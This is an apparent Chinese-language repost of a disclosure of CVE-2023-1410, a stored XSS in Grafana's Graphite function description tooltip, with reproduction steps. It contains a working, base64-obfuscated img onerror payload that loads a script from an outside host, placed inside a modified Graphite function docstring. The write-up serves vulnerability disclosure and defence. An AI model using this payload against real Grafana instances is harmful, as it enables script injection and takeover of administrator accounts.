CVE-2023–1410:Graphite 函数描述工具提示中的存储型 XSS
2023-4-16 13:58:4 Author: Ots安全(查看原文) 阅读量:16 收藏

点击蓝字,关注我们

安装 Graphite 数据源后,可以在仪表板中使用此数据源。这具有使用函数的能力。选择函数后,将鼠标悬停在函数名称上时会出现一个小工具提示。

此工具提示将允许您从查询中删除所选函数或查看函数描述。但是,在将此描述添加到 DOM 时不会执行任何清理。

由于连接到公共数据源相对普遍,攻击者可能会托管一个 Graphite 实例,该实例的功能描述已更改,携带 XSS 有效载荷。

当用户在查询中使用它并无意中将鼠标悬停在功能描述上时,将执行攻击者控制的 XSS 负载。

例如,这可用于使攻击者成为管理员。

重现步骤:

1.创建您自己的 Graphite 实例。我通过跑步来做到这一点

make devenv sources=graphite

2. 现在启动您的 Graphite 容器的控制台并更改以下文件。

/opt/graphite/webapp/graphite/render/functions.py

3.你可以使用任何功能,但是我选择aggregateSeriesLists 功能。

4. 将其描述更改为:

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>

5. 结果如下:

def aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None):"""                                                                              
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
"""if len(seriesListFirstPos) != len(seriesListSecondPos): raise InputParameterError( "seriesListFirstPos and seriesListSecondPos argument must have equal length") results = []
for i in range(0, len(seriesListFirstPos)): firstSeries = seriesListFirstPos[i] secondSeries = seriesListSecondPos[i] aggregated = aggregate(requestContext, (firstSeries, secondSeries), func, xFilesFactor=xFilesFactor) if not aggregated: # empty list, no data found continue result = aggregated[0] # aggregate() can only return len 1 list result.name = result.name[:result.name.find('Series(')] + 'Series(%s,%s)' % (firstSeries.name, secondSeries.name) results.append(result) return results

aggregateSeriesLists.group = 'Combine'aggregateSeriesLists.params = [ Param('seriesListFirstPos', ParamTypes.seriesList, required=True), Param('seriesListSecondPos', ParamTypes.seriesList, required=True), Param('func', ParamTypes.aggFunc, required=True), Param('xFilesFactor', ParamTypes.float), ]

6. 保存并退出文件。重新启动您的 Graphite 容器。

7. 以组织管理员身份登录到您的 Grafana 实例。

8.导航到http://[grafana]/plugins/graphite并点击Create a Graphite data source

9. 输入攻击者的 Graphite 实例的 url(您可能想要激活 Skip SSL Check),然后单击 Save & Test and Explore。

10、在新打开的页面点击Functions旁边的Add图标,然后搜索aggregateSeriesLists并点击添加。

11.将光标悬停在 aggregateSeriesLists 上方,然后将其移动到?图标。

payload 将被触发,在这种情况下,它将包含一个外部脚本,该脚本将导致触发警报。

影响:

当然,攻击者会通过将其所有描述替换为 XSS 负载来增加机会。

如上所示,攻击者现在可以在受害者的浏览器中执行任意 Javascript。

受害者可以是在查询中(或在探索时)使用恶意 Graphite 实例的任何用户,包括组织管理员。

如果是这种情况,攻击者可能会插入一个有效负载,允许他们自己添加为管理员。

点击此处“阅读全文”查看更多内容

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247497276&idx=2&sn=046f415d21e3ac7587b52c412e199cd5&chksm=9badbf77acda366175d173a8d514729015c273dcdbb2ad44800593b653342875ef3ba79d338c#rd
如有侵权请联系:admin#unsafe.sh